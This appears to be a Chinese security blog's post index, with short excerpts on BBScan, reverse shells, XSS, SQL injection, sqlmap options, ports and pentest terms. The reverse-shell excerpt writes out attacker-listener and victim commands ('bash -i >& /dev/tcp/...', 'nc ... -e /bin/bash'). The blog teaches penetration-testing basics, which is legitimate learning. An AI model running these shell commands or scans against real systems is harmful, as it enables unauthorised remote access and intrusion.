- 博客(12)
- 收藏
- 关注
原创 bbscan
扫描单个web服务 www.target.compython BBScan.py --host www.target.com --browser2. 扫描www.target.com和www.target.com/28下的其他主机python BBScan.py --host www.target.com --network 28 --browser3. 扫描txt文件中的所有主机...
2019-10-28 16:50:22 327
原创 反弹shell
多种姿势反弹shellbashattacker 监听nc -lvvp 4444victim 运行bash -i >& /dev/tcp//4444 0>&1nc支持 -e 选项attacker 监听nc -lvvp 4444victim 运行nc 4444 -t -e /bin/bashpythonattacker 监听nc -...
2019-09-09 23:37:04 298 1
原创 xss漏洞
XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器 执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实 施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨 大的,是web安全的头号大敌实施XSS...
2019-09-04 22:33:27 374
原创 sql注入
sql原理传入的参数拼接在数据库的查询语句中 导致一并进入到数据sql注入有5种类型Boolean-based blind SQL injection(布尔型注入)Error-based SQL injection(报错型注入)UNION query SQL injection(可联合查询注入)Stacked queries SQL injection(可多语句查询注入)Time-b...
2019-08-25 22:33:23 222
原创 Linux常用命令
linux主要特征 :一切且文件pwd 显示当前目录名称mkdir 常见目录rmdir 删除目录touch 创建文件mv 移动或者重命名一个文件或者目录cp 复制目录ln link的缩写,用于建立硬(软)链接,常用于软件安装时建软链接useradd 创建用户tar -zxvf 压缩tar -jxvf 解压zip 压缩unzip 解压...
2019-08-06 23:12:51 127
原创 Http请求方法与状态码
请求方法:HEADHEAD方法请求一个与GET请求的响应相同的响应,但没有响应体.POSTPOST方法用于将实体提交到指定的资源,通常导致在服务器上的状态变化或副作用.PUTPUT方法用请求有效载荷替换目标资源的所有当前表示。DELETEDELETE方法删除指定的资源。CONNECTCONNECT方法建立一个到由目标资源标识的服务器的隧道。OPTIONSOPTIONS方法用...
2019-07-29 21:01:24 189
原创 域名DNS 解析
域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务 IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址 域名解析就是域名到IP地址的转换过程 域名的解析工作由DNS服务器完成 互联网中的地址是数字的IP地址,域名解析的作用主要就是为了便于记忆 解析过程,比如,一个域名为:abc.com,是想...
2019-07-26 21:37:46 380
原创 渗透测试常用名词
poc 验证漏洞是否存在代码exp 漏洞利用攻击webshell web下的shell web后门shell 与系统交互的通道反向 由受害者到攻击者正向 由攻击者到受害者菜刀一句话提权 就是提高自己在服务器中的权限payloadgetshell 获取webshell的过程oday(在野oday) 未被纰漏的漏洞1day ...
2019-07-25 20:05:29 852
原创 常用端口
http协议代理服务器常用端口 :80/8080/3128/3081/9080socks代理协议服务器常用端口 :1080FTP(文件传输)协议常用端口 :21Telnet(远程登陆)协议常用端口 :23SSH(安全登录) SCP(文件传输) 端口重定向 默认端口 :22/tcpweblogic 默认端口 :7001webSphere应用程序 默认端口为9080webSphere管...
2019-07-24 20:43:49 351
原创 sqlmap常用命令及使用方法
-d DIRECT 直接连接数据库的连接字符串-u 目标url-I 日志文件 从burp或者webScarab代理日志文件中分析目标-x 网站地图URL 从远程网站地图(sitemap.xml)文件来解析目标-m 文件 将目标地址保存在文件中,一行一个url地址进行批量检测-r 请求文件-c 配置文件 从配置ini文件中加载选项-o 打开所有的优化开关-p...
2019-07-23 23:31:38 915
原创 php获取文件并用MD5加密 并输出到另一个文件中
<?php$welcomefile=file('top10.txt'); //获取文件foreach($welcomefile as $v){ //foreach方法遍历数组 echo md5($v).''; //MD5加密file_put_contents('filename.txt', md5($v).PHP_EOL,FILE_APPEND); //...
2019-07-16 21:23:08 858
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人